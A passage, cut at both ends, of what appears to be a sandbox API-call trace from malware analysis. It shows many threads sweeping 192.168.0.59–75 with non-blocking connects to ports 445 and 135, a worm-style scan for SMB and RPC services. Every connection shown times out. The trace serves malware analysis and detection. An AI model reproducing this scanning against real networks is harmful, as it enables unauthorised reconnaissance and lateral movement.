(cp="192.168.0.75") returned 0x4b00a8c0 [0091.603] htons (hostshort=0x1bd) returned 0xbd01 [0091.603] socket (af=2, type=1, protocol=6) returned 0xf84 [0091.603] ioctlsocket (in: s=0xf84, cmd=-2147195266, argp=0x11deff34 | out: argp=0x11deff34) returned 0 [0091.603] connect (s=0xf84, name=0x11deff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.75"), namelen=16) returned -1 [0091.604] WSAGetLastError () returned 10035 [0091.604] select (in: nfds=0, readfds=0x0, writefds=0x11defd08, exceptfds=0x11defe10, timeout=0x11deff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11defd08, exceptfds=0x11defe10) returned 0 [0096.611] closesocket (s=0xf84) returned 0 [0096.611] inet_addr (cp="192.168.0.75") returned 0x4b00a8c0 [0096.611] htons (hostshort=0x87) returned 0x8700 [0096.611] socket (af=2, type=1, protocol=6) returned 0xf84 [0096.611] ioctlsocket (in: s=0xf84, cmd=-2147195266, argp=0x11deff34 | out: argp=0x11deff34) returned 0 [0096.612] connect (s=0xf84, name=0x11deff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.75"), namelen=16) returned -1 [0096.612] WSAGetLastError () returned 10035 [0096.612] select (in: nfds=0, readfds=0x0, writefds=0x11defd08, exceptfds=0x11defe10, timeout=0x11deff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11defd08, exceptfds=0x11defe10) returned 0 [0101.811] closesocket (s=0xf84) returned 0 [0101.812] RtlExitUserThread (Status=0x0) Thread: id = 238 os_tid = 0xda4 [0091.606] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072870 [0091.606] free (_Block=0x2072870) [0091.606] inet_addr (cp="192.168.0.74") returned 0x4a00a8c0 [0091.606] htons (hostshort=0x1bd) returned 0xbd01 [0091.606] socket (af=2, type=1, protocol=6) returned 0xf90 [0091.606] ioctlsocket (in: s=0xf90, cmd=-2147195266, argp=0x11f2ff34 | out: argp=0x11f2ff34) returned 0 [0091.606] connect (s=0xf90, name=0x11f2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.74"), namelen=16) returned -1 [0091.610] WSAGetLastError () returned 10035 [0091.610] select (in: nfds=0, readfds=0x0, writefds=0x11f2fd08, exceptfds=0x11f2fe10, timeout=0x11f2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11f2fd08, exceptfds=0x11f2fe10) returned 0 [0096.623] closesocket (s=0xf90) returned 0 [0096.635] inet_addr (cp="192.168.0.74") returned 0x4a00a8c0 [0096.635] htons (hostshort=0x87) returned 0x8700 [0096.637] socket (af=2, type=1, protocol=6) returned 0xf90 [0097.080] ioctlsocket (in: s=0xf90, cmd=-2147195266, argp=0x11f2ff34 | out: argp=0x11f2ff34) returned 0 [0097.081] connect (s=0xf90, name=0x11f2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.74"), namelen=16) returned -1 [0097.081] WSAGetLastError () returned 10035 [0097.081] select (in: nfds=0, readfds=0x0, writefds=0x11f2fd08, exceptfds=0x11f2fe10, timeout=0x11f2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11f2fd08, exceptfds=0x11f2fe10) returned 0 [0102.102] closesocket (s=0xf90) returned 0 [0102.103] RtlExitUserThread (Status=0x0) Thread: id = 239 os_tid = 0xda8 [0091.610] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072848 [0091.610] free (_Block=0x2072848) [0091.610] inet_addr (cp="192.168.0.73") returned 0x4900a8c0 [0091.610] htons (hostshort=0x1bd) returned 0xbd01 [0091.610] socket (af=2, type=1, protocol=6) returned 0xf9c [0091.611] ioctlsocket (in: s=0xf9c, cmd=-2147195266, argp=0x1206ff34 | out: argp=0x1206ff34) returned 0 [0091.611] connect (s=0xf9c, name=0x1206ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.73"), namelen=16) returned -1 [0091.611] WSAGetLastError () returned 10035 [0091.611] select (in: nfds=0, readfds=0x0, writefds=0x1206fd08, exceptfds=0x1206fe10, timeout=0x1206ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1206fd08, exceptfds=0x1206fe10) returned 0 [0097.081] closesocket (s=0xf9c) returned 0 [0097.082] inet_addr (cp="192.168.0.73") returned 0x4900a8c0 [0097.082] htons (hostshort=0x87) returned 0x8700 [0097.082] socket (af=2, type=1, protocol=6) returned 0xf9c [0097.082] ioctlsocket (in: s=0xf9c, cmd=-2147195266, argp=0x1206ff34 | out: argp=0x1206ff34) returned 0 [0097.082] connect (s=0xf9c, name=0x1206ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.73"), namelen=16) returned -1 [0097.082] WSAGetLastError () returned 10035 [0097.082] select (in: nfds=0, readfds=0x0, writefds=0x1206fd08, exceptfds=0x1206fe10, timeout=0x1206ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1206fd08, exceptfds=0x1206fe10) returned 0 [0102.100] closesocket (s=0xf9c) returned 0 [0102.101] RtlExitUserThread (Status=0x0) Thread: id = 240 os_tid = 0xdac [0091.612] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072820 [0091.612] free (_Block=0x2072820) [0091.612] inet_addr (cp="192.168.0.72") returned 0x4800a8c0 [0091.612] htons (hostshort=0x1bd) returned 0xbd01 [0091.612] socket (af=2, type=1, protocol=6) returned 0xfa8 [0091.612] ioctlsocket (in: s=0xfa8, cmd=-2147195266, argp=0x121aff34 | out: argp=0x121aff34) returned 0 [0091.612] connect (s=0xfa8, name=0x121aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.72"), namelen=16) returned -1 [0091.613] WSAGetLastError () returned 10035 [0091.613] select (in: nfds=0, readfds=0x0, writefds=0x121afd08, exceptfds=0x121afe10, timeout=0x121aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x121afd08, exceptfds=0x121afe10) returned 0 [0097.083] closesocket (s=0xfa8) returned 0 [0097.083] inet_addr (cp="192.168.0.72") returned 0x4800a8c0 [0097.083] htons (hostshort=0x87) returned 0x8700 [0097.083] socket (af=2, type=1, protocol=6) returned 0xfa8 [0097.084] ioctlsocket (in: s=0xfa8, cmd=-2147195266, argp=0x121aff34 | out: argp=0x121aff34) returned 0 [0097.084] connect (s=0xfa8, name=0x121aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.72"), namelen=16) returned -1 [0097.084] WSAGetLastError () returned 10035 [0097.084] select (in: nfds=0, readfds=0x0, writefds=0x121afd08, exceptfds=0x121afe10, timeout=0x121aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x121afd08, exceptfds=0x121afe10) returned 0 [0102.094] closesocket (s=0xfa8) returned 0 [0102.099] RtlExitUserThread (Status=0x0) Thread: id = 241 os_tid = 0xdb0 [0091.613] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20727f8 [0091.613] free (_Block=0x20727f8) [0091.613] inet_addr (cp="192.168.0.71") returned 0x4700a8c0 [0091.613] htons (hostshort=0x1bd) returned 0xbd01 [0091.613] socket (af=2, type=1, protocol=6) returned 0xfb4 [0091.615] ioctlsocket (in: s=0xfb4, cmd=-2147195266, argp=0x122eff34 | out: argp=0x122eff34) returned 0 [0091.616] connect (s=0xfb4, name=0x122eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.71"), namelen=16) returned -1 [0091.616] WSAGetLastError () returned 10035 [0091.616] select (in: nfds=0, readfds=0x0, writefds=0x122efd08, exceptfds=0x122efe10, timeout=0x122eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x122efd08, exceptfds=0x122efe10) returned 0 [0097.084] closesocket (s=0xfb4) returned 0 [0097.085] inet_addr (cp="192.168.0.71") returned 0x4700a8c0 [0097.085] htons (hostshort=0x87) returned 0x8700 [0097.085] socket (af=2, type=1, protocol=6) returned 0xfb4 [0097.085] ioctlsocket (in: s=0xfb4, cmd=-2147195266, argp=0x122eff34 | out: argp=0x122eff34) returned 0 [0097.085] connect (s=0xfb4, name=0x122eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.71"), namelen=16) returned -1 [0097.085] WSAGetLastError () returned 10035 [0097.085] select (in: nfds=0, readfds=0x0, writefds=0x122efd08, exceptfds=0x122efe10, timeout=0x122eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x122efd08, exceptfds=0x122efe10) returned 0 [0102.123] closesocket (s=0xfb4) returned 0 [0102.124] RtlExitUserThread (Status=0x0) Thread: id = 242 os_tid = 0xdb4 [0091.617] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20727d0 [0091.617] free (_Block=0x20727d0) [0091.617] inet_addr (cp="192.168.0.70") returned 0x4600a8c0 [0091.617] htons (hostshort=0x1bd) returned 0xbd01 [0091.617] socket (af=2, type=1, protocol=6) returned 0xfc0 [0091.617] ioctlsocket (in: s=0xfc0, cmd=-2147195266, argp=0x1242ff34 | out: argp=0x1242ff34) returned 0 [0091.617] connect (s=0xfc0, name=0x1242ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.70"), namelen=16) returned -1 [0091.618] WSAGetLastError () returned 10035 [0091.618] select (in: nfds=0, readfds=0x0, writefds=0x1242fd08, exceptfds=0x1242fe10, timeout=0x1242ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1242fd08, exceptfds=0x1242fe10) returned 0 [0097.086] closesocket (s=0xfc0) returned 0 [0097.086] inet_addr (cp="192.168.0.70") returned 0x4600a8c0 [0097.086] htons (hostshort=0x87) returned 0x8700 [0097.086] socket (af=2, type=1, protocol=6) returned 0xfc0 [0097.086] ioctlsocket (in: s=0xfc0, cmd=-2147195266, argp=0x1242ff34 | out: argp=0x1242ff34) returned 0 [0097.086] connect (s=0xfc0, name=0x1242ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.70"), namelen=16) returned -1 [0097.087] WSAGetLastError () returned 10035 [0097.087] select (in: nfds=0, readfds=0x0, writefds=0x1242fd08, exceptfds=0x1242fe10, timeout=0x1242ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1242fd08, exceptfds=0x1242fe10) returned 0 [0102.121] closesocket (s=0xfc0) returned 0 [0102.122] RtlExitUserThread (Status=0x0) Thread: id = 243 os_tid = 0xdb8 [0091.618] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20727a8 [0091.618] free (_Block=0x20727a8) [0091.618] inet_addr (cp="192.168.0.69") returned 0x4500a8c0 [0091.618] htons (hostshort=0x1bd) returned 0xbd01 [0091.618] socket (af=2, type=1, protocol=6) returned 0xfcc [0091.620] ioctlsocket (in: s=0xfcc, cmd=-2147195266, argp=0x1256ff34 | out: argp=0x1256ff34) returned 0 [0091.620] connect (s=0xfcc, name=0x1256ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.69"), namelen=16) returned -1 [0091.621] WSAGetLastError () returned 10035 [0091.621] select (in: nfds=0, readfds=0x0, writefds=0x1256fd08, exceptfds=0x1256fe10, timeout=0x1256ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1256fd08, exceptfds=0x1256fe10) returned 0 [0097.087] closesocket (s=0xfcc) returned 0 [0097.087] inet_addr (cp="192.168.0.69") returned 0x4500a8c0 [0097.087] htons (hostshort=0x87) returned 0x8700 [0097.087] socket (af=2, type=1, protocol=6) returned 0xfcc [0097.088] ioctlsocket (in: s=0xfcc, cmd=-2147195266, argp=0x1256ff34 | out: argp=0x1256ff34) returned 0 [0097.088] connect (s=0xfcc, name=0x1256ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.69"), namelen=16) returned -1 [0097.088] WSAGetLastError () returned 10035 [0097.088] select (in: nfds=0, readfds=0x0, writefds=0x1256fd08, exceptfds=0x1256fe10, timeout=0x1256ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1256fd08, exceptfds=0x1256fe10) returned 0 [0102.120] closesocket (s=0xfcc) returned 0 [0102.121] RtlExitUserThread (Status=0x0) Thread: id = 244 os_tid = 0xdbc [0091.621] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072780 [0091.621] free (_Block=0x2072780) [0091.621] inet_addr (cp="192.168.0.68") returned 0x4400a8c0 [0091.621] htons (hostshort=0x1bd) returned 0xbd01 [0091.621] socket (af=2, type=1, protocol=6) returned 0xfd8 [0091.622] ioctlsocket (in: s=0xfd8, cmd=-2147195266, argp=0x126aff34 | out: argp=0x126aff34) returned 0 [0091.622] connect (s=0xfd8, name=0x126aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.68"), namelen=16) returned -1 [0091.622] WSAGetLastError () returned 10035 [0091.622] select (in: nfds=0, readfds=0x0, writefds=0x126afd08, exceptfds=0x126afe10, timeout=0x126aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x126afd08, exceptfds=0x126afe10) returned 0 [0097.088] closesocket (s=0xfd8) returned 0 [0097.089] inet_addr (cp="192.168.0.68") returned 0x4400a8c0 [0097.089] htons (hostshort=0x87) returned 0x8700 [0097.089] socket (af=2, type=1, protocol=6) returned 0xfd8 [0097.089] ioctlsocket (in: s=0xfd8, cmd=-2147195266, argp=0x126aff34 | out: argp=0x126aff34) returned 0 [0097.089] connect (s=0xfd8, name=0x126aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.68"), namelen=16) returned -1 [0097.089] WSAGetLastError () returned 10035 [0097.089] select (in: nfds=0, readfds=0x0, writefds=0x126afd08, exceptfds=0x126afe10, timeout=0x126aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x126afd08, exceptfds=0x126afe10) returned 0 [0102.118] closesocket (s=0xfd8) returned 0 [0102.119] RtlExitUserThread (Status=0x0) Thread: id = 245 os_tid = 0xdc0 [0091.624] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072758 [0091.624] free (_Block=0x2072758) [0091.624] inet_addr (cp="192.168.0.67") returned 0x4300a8c0 [0091.624] htons (hostshort=0x1bd) returned 0xbd01 [0091.624] socket (af=2, type=1, protocol=6) returned 0xfe4 [0091.624] ioctlsocket (in: s=0xfe4, cmd=-2147195266, argp=0x127eff34 | out: argp=0x127eff34) returned 0 [0091.624] connect (s=0xfe4, name=0x127eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.67"), namelen=16) returned -1 [0091.626] WSAGetLastError () returned 10035 [0091.626] select (in: nfds=0, readfds=0x0, writefds=0x127efd08, exceptfds=0x127efe10, timeout=0x127eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x127efd08, exceptfds=0x127efe10) returned 0 [0097.095] closesocket (s=0xfe4) returned 0 [0097.096] inet_addr (cp="192.168.0.67") returned 0x4300a8c0 [0097.096] htons (hostshort=0x87) returned 0x8700 [0097.096] socket (af=2, type=1, protocol=6) returned 0xfe4 [0097.096] ioctlsocket (in: s=0xfe4, cmd=-2147195266, argp=0x127eff34 | out: argp=0x127eff34) returned 0 [0097.096] connect (s=0xfe4, name=0x127eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.67"), namelen=16) returned -1 [0097.096] WSAGetLastError () returned 10035 [0097.096] select (in: nfds=0, readfds=0x0, writefds=0x127efd08, exceptfds=0x127efe10, timeout=0x127eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x127efd08, exceptfds=0x127efe10) returned 0 [0102.109] closesocket (s=0xfe4) returned 0 [0102.110] RtlExitUserThread (Status=0x0) Thread: id = 246 os_tid = 0xdc4 [0091.627] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072700 [0091.627] free (_Block=0x2072700) [0091.627] inet_addr (cp="192.168.0.66") returned 0x4200a8c0 [0091.627] htons (hostshort=0x1bd) returned 0xbd01 [0091.627] socket (af=2, type=1, protocol=6) returned 0xff0 [0091.629] ioctlsocket (in: s=0xff0, cmd=-2147195266, argp=0x1292ff34 | out: argp=0x1292ff34) returned 0 [0091.629] connect (s=0xff0, name=0x1292ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.66"), namelen=16) returned -1 [0091.629] WSAGetLastError () returned 10035 [0091.629] select (in: nfds=0, readfds=0x0, writefds=0x1292fd08, exceptfds=0x1292fe10, timeout=0x1292ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1292fd08, exceptfds=0x1292fe10) returned 0 [0097.094] closesocket (s=0xff0) returned 0 [0097.094] inet_addr (cp="192.168.0.66") returned 0x4200a8c0 [0097.094] htons (hostshort=0x87) returned 0x8700 [0097.094] socket (af=2, type=1, protocol=6) returned 0xff0 [0097.095] ioctlsocket (in: s=0xff0, cmd=-2147195266, argp=0x1292ff34 | out: argp=0x1292ff34) returned 0 [0097.095] connect (s=0xff0, name=0x1292ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.66"), namelen=16) returned -1 [0097.095] WSAGetLastError () returned 10035 [0097.095] select (in: nfds=0, readfds=0x0, writefds=0x1292fd08, exceptfds=0x1292fe10, timeout=0x1292ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1292fd08, exceptfds=0x1292fe10) returned 0 [0102.111] closesocket (s=0xff0) returned 0 [0102.111] RtlExitUserThread (Status=0x0) Thread: id = 247 os_tid = 0xdc8 [0091.630] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20726d8 [0091.630] free (_Block=0x20726d8) [0091.630] inet_addr (cp="192.168.0.65") returned 0x4100a8c0 [0091.630] htons (hostshort=0x1bd) returned 0xbd01 [0091.630] socket (af=2, type=1, protocol=6) returned 0xffc [0091.632] ioctlsocket (in: s=0xffc, cmd=-2147195266, argp=0x12a6ff34 | out: argp=0x12a6ff34) returned 0 [0091.632] connect (s=0xffc, name=0x12a6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.65"), namelen=16) returned -1 [0091.632] WSAGetLastError () returned 10035 [0091.632] select (in: nfds=0, readfds=0x0, writefds=0x12a6fd08, exceptfds=0x12a6fe10, timeout=0x12a6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12a6fd08, exceptfds=0x12a6fe10) returned 0 [0097.093] closesocket (s=0xffc) returned 0 [0097.093] inet_addr (cp="192.168.0.65") returned 0x4100a8c0 [0097.093] htons (hostshort=0x87) returned 0x8700 [0097.093] socket (af=2, type=1, protocol=6) returned 0xffc [0097.093] ioctlsocket (in: s=0xffc, cmd=-2147195266, argp=0x12a6ff34 | out: argp=0x12a6ff34) returned 0 [0097.093] connect (s=0xffc, name=0x12a6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.65"), namelen=16) returned -1 [0097.094] WSAGetLastError () returned 10035 [0097.094] select (in: nfds=0, readfds=0x0, writefds=0x12a6fd08, exceptfds=0x12a6fe10, timeout=0x12a6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12a6fd08, exceptfds=0x12a6fe10) returned 0 [0102.113] closesocket (s=0xffc) returned 0 [0102.114] RtlExitUserThread (Status=0x0) Thread: id = 248 os_tid = 0xdcc [0091.633] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20726b0 [0091.633] free (_Block=0x20726b0) [0091.633] inet_addr (cp="192.168.0.64") returned 0x4000a8c0 [0091.633] htons (hostshort=0x1bd) returned 0xbd01 [0091.633] socket (af=2, type=1, protocol=6) returned 0x100c [0091.633] ioctlsocket (in: s=0x100c, cmd=-2147195266, argp=0x12baff34 | out: argp=0x12baff34) returned 0 [0091.633] connect (s=0x100c, name=0x12baff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.64"), namelen=16) returned -1 [0091.634] WSAGetLastError () returned 10035 [0091.634] select (in: nfds=0, readfds=0x0, writefds=0x12bafd08, exceptfds=0x12bafe10, timeout=0x12baff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12bafd08, exceptfds=0x12bafe10) returned 0 [0097.091] closesocket (s=0x100c) returned 0 [0097.092] inet_addr (cp="192.168.0.64") returned 0x4000a8c0 [0097.092] htons (hostshort=0x87) returned 0x8700 [0097.092] socket (af=2, type=1, protocol=6) returned 0x100c [0097.092] ioctlsocket (in: s=0x100c, cmd=-2147195266, argp=0x12baff34 | out: argp=0x12baff34) returned 0 [0097.092] connect (s=0x100c, name=0x12baff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.64"), namelen=16) returned -1 [0097.092] WSAGetLastError () returned 10035 [0097.092] select (in: nfds=0, readfds=0x0, writefds=0x12bafd08, exceptfds=0x12bafe10, timeout=0x12baff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12bafd08, exceptfds=0x12bafe10) returned 0 [0102.115] closesocket (s=0x100c) returned 0 [0102.116] RtlExitUserThread (Status=0x0) Thread: id = 249 os_tid = 0xdd0 [0091.639] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072688 [0091.639] free (_Block=0x2072688) [0091.639] inet_addr (cp="192.168.0.63") returned 0x3f00a8c0 [0091.639] htons (hostshort=0x1bd) returned 0xbd01 [0091.639] socket (af=2, type=1, protocol=6) returned 0x1018 [0091.639] ioctlsocket (in: s=0x1018, cmd=-2147195266, argp=0x12ceff34 | out: argp=0x12ceff34) returned 0 [0091.639] connect (s=0x1018, name=0x12ceff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.63"), namelen=16) returned -1 [0091.640] WSAGetLastError () returned 10035 [0091.640] select (in: nfds=0, readfds=0x0, writefds=0x12cefd08, exceptfds=0x12cefe10, timeout=0x12ceff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12cefd08, exceptfds=0x12cefe10) returned 0 [0097.090] closesocket (s=0x1018) returned 0 [0097.091] inet_addr (cp="192.168.0.63") returned 0x3f00a8c0 [0097.091] htons (hostshort=0x87) returned 0x8700 [0097.091] socket (af=2, type=1, protocol=6) returned 0x1018 [0097.091] ioctlsocket (in: s=0x1018, cmd=-2147195266, argp=0x12ceff34 | out: argp=0x12ceff34) returned 0 [0097.091] connect (s=0x1018, name=0x12ceff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.63"), namelen=16) returned -1 [0097.091] WSAGetLastError () returned 10035 [0097.091] select (in: nfds=0, readfds=0x0, writefds=0x12cefd08, exceptfds=0x12cefe10, timeout=0x12ceff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12cefd08, exceptfds=0x12cefe10) returned 0 [0102.117] closesocket (s=0x1018) returned 0 [0102.117] RtlExitUserThread (Status=0x0) Thread: id = 250 os_tid = 0xdd4 [0091.640] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072660 [0091.640] free (_Block=0x2072660) [0091.640] inet_addr (cp="192.168.0.62") returned 0x3e00a8c0 [0091.641] htons (hostshort=0x1bd) returned 0xbd01 [0091.641] socket (af=2, type=1, protocol=6) returned 0x1024 [0091.641] ioctlsocket (in: s=0x1024, cmd=-2147195266, argp=0x12e2ff34 | out: argp=0x12e2ff34) returned 0 [0091.641] connect (s=0x1024, name=0x12e2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.62"), namelen=16) returned -1 [0091.642] WSAGetLastError () returned 10035 [0091.642] select (in: nfds=0, readfds=0x0, writefds=0x12e2fd08, exceptfds=0x12e2fe10, timeout=0x12e2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12e2fd08, exceptfds=0x12e2fe10) returned 0 [0097.104] closesocket (s=0x1024) returned 0 [0097.105] inet_addr (cp="192.168.0.62") returned 0x3e00a8c0 [0097.105] htons (hostshort=0x87) returned 0x8700 [0097.105] socket (af=2, type=1, protocol=6) returned 0x1024 [0097.105] ioctlsocket (in: s=0x1024, cmd=-2147195266, argp=0x12e2ff34 | out: argp=0x12e2ff34) returned 0 [0097.105] connect (s=0x1024, name=0x12e2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.62"), namelen=16) returned -1 [0097.105] WSAGetLastError () returned 10035 [0097.105] select (in: nfds=0, readfds=0x0, writefds=0x12e2fd08, exceptfds=0x12e2fe10, timeout=0x12e2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12e2fd08, exceptfds=0x12e2fe10) returned 0 [0102.142] closesocket (s=0x1024) returned 0 [0102.143] RtlExitUserThread (Status=0x0) Thread: id = 251 os_tid = 0xdd8 [0091.642] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072638 [0091.642] free (_Block=0x2072638) [0091.642] inet_addr (cp="192.168.0.61") returned 0x3d00a8c0 [0091.642] htons (hostshort=0x1bd) returned 0xbd01 [0091.642] socket (af=2, type=1, protocol=6) returned 0x1030 [0091.643] ioctlsocket (in: s=0x1030, cmd=-2147195266, argp=0x12f6ff34 | out: argp=0x12f6ff34) returned 0 [0091.643] connect (s=0x1030, name=0x12f6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.61"), namelen=16) returned -1 [0091.643] WSAGetLastError () returned 10035 [0091.643] select (in: nfds=0, readfds=0x0, writefds=0x12f6fd08, exceptfds=0x12f6fe10, timeout=0x12f6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12f6fd08, exceptfds=0x12f6fe10) returned 0 [0097.103] closesocket (s=0x1030) returned 0 [0097.104] inet_addr (cp="192.168.0.61") returned 0x3d00a8c0 [0097.104] htons (hostshort=0x87) returned 0x8700 [0097.104] socket (af=2, type=1, protocol=6) returned 0x1030 [0097.104] ioctlsocket (in: s=0x1030, cmd=-2147195266, argp=0x12f6ff34 | out: argp=0x12f6ff34) returned 0 [0097.104] connect (s=0x1030, name=0x12f6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.61"), namelen=16) returned -1 [0097.104] WSAGetLastError () returned 10035 [0097.104] select (in: nfds=0, readfds=0x0, writefds=0x12f6fd08, exceptfds=0x12f6fe10, timeout=0x12f6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x12f6fd08, exceptfds=0x12f6fe10) returned 0 [0102.140] closesocket (s=0x1030) returned 0 [0102.141] RtlExitUserThread (Status=0x0) Thread: id = 252 os_tid = 0xddc [0091.644] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072610 [0091.644] free (_Block=0x2072610) [0091.644] inet_addr (cp="192.168.0.60") returned 0x3c00a8c0 [0091.644] htons (hostshort=0x1bd) returned 0xbd01 [0091.644] socket (af=2, type=1, protocol=6) returned 0x103c [0091.644] ioctlsocket (in: s=0x103c, cmd=-2147195266, argp=0x130aff34 | out: argp=0x130aff34) returned 0 [0091.644] connect (s=0x103c, name=0x130aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.60"), namelen=16) returned -1 [0091.645] WSAGetLastError () returned 10035 [0091.645] select (in: nfds=0, readfds=0x0, writefds=0x130afd08, exceptfds=0x130afe10, timeout=0x130aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x130afd08, exceptfds=0x130afe10) returned 0 [0097.102] closesocket (s=0x103c) returned 0 [0097.102] inet_addr (cp="192.168.0.60") returned 0x3c00a8c0 [0097.102] htons (hostshort=0x87) returned 0x8700 [0097.102] socket (af=2, type=1, protocol=6) returned 0x103c [0097.103] ioctlsocket (in: s=0x103c, cmd=-2147195266, argp=0x130aff34 | out: argp=0x130aff34) returned 0 [0097.103] connect (s=0x103c, name=0x130aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.60"), namelen=16) returned -1 [0097.103] WSAGetLastError () returned 10035 [0097.103] select (in: nfds=0, readfds=0x0, writefds=0x130afd08, exceptfds=0x130afe10, timeout=0x130aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x130afd08, exceptfds=0x130afe10) returned 0 [0102.138] closesocket (s=0x103c) returned 0 [0102.139] RtlExitUserThread (Status=0x0) Thread: id = 253 os_tid = 0xde0 [0091.645] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20725e8 [0091.645] free (_Block=0x20725e8) [0091.645] inet_addr (cp="192.168.0.59") returned 0x3b00a8c0 [0091.646] htons (hostshort=0x1bd) returned 0xbd01 [0091.646] socket (af=2, type=1, protocol=6) returned 0x1048 [0091.648] ioctlsocket (in: s=0x1048, cmd=-2147195266, argp=0x131eff34 | out: argp=0x131eff34) returned 0 [0091.648] connect (s=0x1048, name=0x131eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.59"), namelen=16) returned -1 [0091.648] WSAGetLastError () returned 10035 [0091.648] select (in: nfds=0, readfds=0x0, writefds=0x131efd08, exceptfds=0x131efe10, timeout=0x131eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x131efd08, exceptfds=0x131efe10) returned 0 [0097.100] closesocket 